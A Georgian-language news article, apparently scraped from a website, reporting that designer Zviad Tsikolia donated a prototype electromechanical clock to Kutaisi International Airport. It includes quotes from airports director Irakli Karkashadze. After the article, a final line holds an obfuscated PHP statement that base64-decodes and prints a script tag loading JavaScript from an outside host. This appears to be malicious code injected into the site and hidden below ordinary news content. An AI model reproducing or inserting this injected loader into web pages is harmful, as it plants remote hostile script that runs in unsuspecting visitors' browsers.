celsiusi
ავერსი საქკაბელი

 ქართველმა სამრეწველო დიზაინერმა ზვიად ციკოლიამ საქართველოს აეროპორტების გაერთიანებას ექსკლუზიურად დავით აღმაშენებლის სახელობის ქუთაისის საერთაშორისო აეროპორტისთვის დამზადებული საათი უსასყიდლოდ გადასცა.

აეროპორტების გაერთიანების ინფორმაციით, ექსკლუზიურად ქუთაისის საერთაშორისო აეროპორტისთვის შექმნილი ელექტრომექანიკური საათი, ,,ციკოლიას SEVEN-ის ბრენდის მაჯის საათის პროტოტიპია და დღეიდან მისი ხილვა აეროპორტის შესასვლელში, გაფრენის დარბაზშია შესაძლებელი. საქართველოს აეროპორტების გაერთიანების გენერალურმა დირექტორმა ირაკლი ქარქაშაძემ, ცნობილ ქართველ დიზაინერს საჩუქრისთვის მადლობა პირადად გადაუხადა, ქუთაისის საერთაშორისო აეროპორტი დაათვალიერებინა და აეროპორტში დაგეგმილი სიახლეები გააცნო.

,,ქუთაისის საერთაშორისო აეროპორტში, წლების ოპერირების მიუხედავად, სამწუხაროდ ტერმინალში არ გვქონდა დიდი საათი. როდესაც ჩვენ სხვა ქვეყნის პრაქტიკებს ვაკვირდებოდით, სადაც ადგილობრივი უდიდესი ბრენდების საათები იყო წარმოდგენილი, დაგვებადა იდეა, რომ საქართველოში, ქუთაისის აეროპორტში ქართული დიზაინის საათი ყოფილიყო. ციკოლიას SEVEN-ის ბრენდის საათი აეროპორტების გაერთიანებას და ქუთაისის საერთაშორისო აეროპორტს სრულიად უსასყიდლოდ გადმოგვეცა. მადლობა მინდა გადავუხადო ზვიად ციკოლიას ამ თანამშრომლობისათვის. ჩვენ არაერთ საინტერესო პროექტზე გვისაუბრია და იმედი მაქვს, რომ ჩვენი თანამშრომლობა გაგრძელდება. მგზავრებს კი ვუსურვებ დროულ და უსაფრთხო ფრენებს“, - განაცხადა ირაკლი ქარქაშაძემ.

აეროპორტების გაერთიანების ინფორმაციით, საგანგებოდ ქუთაისის საერთაშორისო აეროპორტისთვის შექმნილი ელექტრომექანიკური საათი არის უნიკალური დიზაინის და ექსკლუზიური კოლექციის ნაწილი, რომელიც არ მეორდება.

„ქართველი სამრეწველო დიზაინერის განცხადებით, დროის უპირატესობა სწორედ ავიაციის სფერომ გადაჭრა.

აეროპორტში ვიზიტისას, ზვიად ციკოლიამ იმედი გამოთქვა, რომ ქუთაისის საერთაშორისო აეროპორტთან მისი თანამშრომლობა სხვა პროექტების მიმართულებით მომავალშიც გაგრძელდება. საერთაშორისო მასშტაბის ცნობილ ქართველ დიზაინერს ზვიად ციკოლიას დიზაინის მიმართულებით მსოფლიოს ყველაზე პრესტიჟული ჯილდო’’ RED DOT’’ ორჯერ მიენიჭა“, - ნათქვამია გავრცელებულ ინფორმაციაში.

140
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");